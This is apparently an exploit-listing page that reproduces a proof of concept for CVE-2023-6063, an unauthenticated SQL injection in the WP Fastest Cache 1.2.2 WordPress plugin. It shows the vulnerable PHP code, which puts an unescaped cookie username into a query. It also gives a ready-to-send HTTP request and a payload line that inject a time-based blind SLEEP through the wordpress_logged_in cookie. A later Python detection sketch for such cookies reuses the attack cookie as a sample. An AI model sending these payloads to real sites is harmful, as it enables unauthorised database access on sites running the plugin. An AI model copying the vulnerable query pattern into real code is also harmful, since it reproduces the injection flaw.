WP Fastest Cache 1.2.2 Unauthenticated SQL Injection

CVE: CVE-2023-6063
Category: CWE-89
Price: $500
Severity: High
Author: Rajesh Maurya
Risk: Critical
Exploitation Type: Remote
Date: 2024-02-29
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.725 0.88


Our sensors found this exploit at:

Below is a copy:

# Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2
# Date: 14.11.2023
# Exploit Author: Meryem Takn
# Vendor Homepage:
# Software Link:
# Version: WP Fastest Cache 1.2.2
# Tested on: WP Fastest Cache 1.2.2
# CVE: CVE-2023-6063
## Description
An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication.
## Vuln Code
    public function is_user_admin(){
        global $wpdb;

        foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
            if(preg_match("/wordpress_logged_in/i", $cookie_key)){
                // Keeps the text before the first "|"; a value with no "|" is left unchanged
                $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value);
            }
        }

        if(isset($username) && $username){
            // $username variable is not escaped: vulnerable to SQL injection
            $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`
                                   FROM `$wpdb->users`
                                   INNER JOIN `$wpdb->usermeta`
                                   ON `$wpdb->users`.`user_login` = \"$username\" AND
## Exploit
GET / HTTP/1.1
Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221
Host: meryem.local
## Parameter: Cookie #1* ((custom) HEADER)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg
## References
- WPScan Blog Post
- WPScan Vulnerability
- CVE-2023-6063
## Credits
- Original Researcher: Alex Sanford
- PoC: Meryem Takn
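
A detection sketch for the cookie handling shown under "Vuln Code", added here as an example and not part of the original advisory or the plugin's code. It mirrors the plugin's username extraction and flags `wordpress_logged_in*` cookies that would break out of the double-quoted SQL literal; the four-field cookie layout, the function names and the sample headers are assumptions (the second sample is the request cookie from this page, the others are constructed).

```python
import re
from urllib.parse import unquote

COOKIE_KEY = re.compile(r"wordpress_logged_in", re.I)  # same key test as the plugin
# Assumed layout of a genuine value: user_login|expiration|token|hmac
WELL_FORMED = re.compile(r'^[^|"\\]+\|\d+\|[0-9A-Za-z]+\|[0-9a-f]+$')

# Sample Cookie headers: first and third are constructed, second is from this page.
SAMPLES = [
    "wordpress_logged_in_abc123=editor%7C1700000000%7CtokenABC%7C0123abcd; theme=dark",
    "wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221",
    "wordpress_logged_in_x=justtext",
]

def plugin_username(value):
    """Mirror the plugin's preg_replace: a value with no '|' comes back unchanged."""
    return re.sub(r"^([^|]+)\|.+", r"\1", value)

def inspect_cookie_header(header):
    """Return (cookie_name, extracted_username, reasons) for each suspicious cookie."""
    findings = []
    for part in header.split(";"):
        name, _, raw = part.strip().partition("=")
        if not COOKIE_KEY.search(name):
            continue
        value = unquote(raw)  # PHP hands the plugin the URL-decoded value
        username = plugin_username(value)
        reasons = []
        if not WELL_FORMED.match(value):
            reasons.append("malformed")  # not user|expiry|token|hmac
        if re.search(r'["\\]', username):
            reasons.append("string-breakout")  # would end the \"$username\" literal
        if reasons:
            findings.append((name, username, reasons))
    return findings

if __name__ == "__main__":
    for header in SAMPLES:
        print(inspect_cookie_header(header) or "ok")
```

The "malformed" reason alone is a weak signal (any stale or truncated cookie triggers it); "string-breakout" is the one tied to the unescaped `$username` interpolation.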
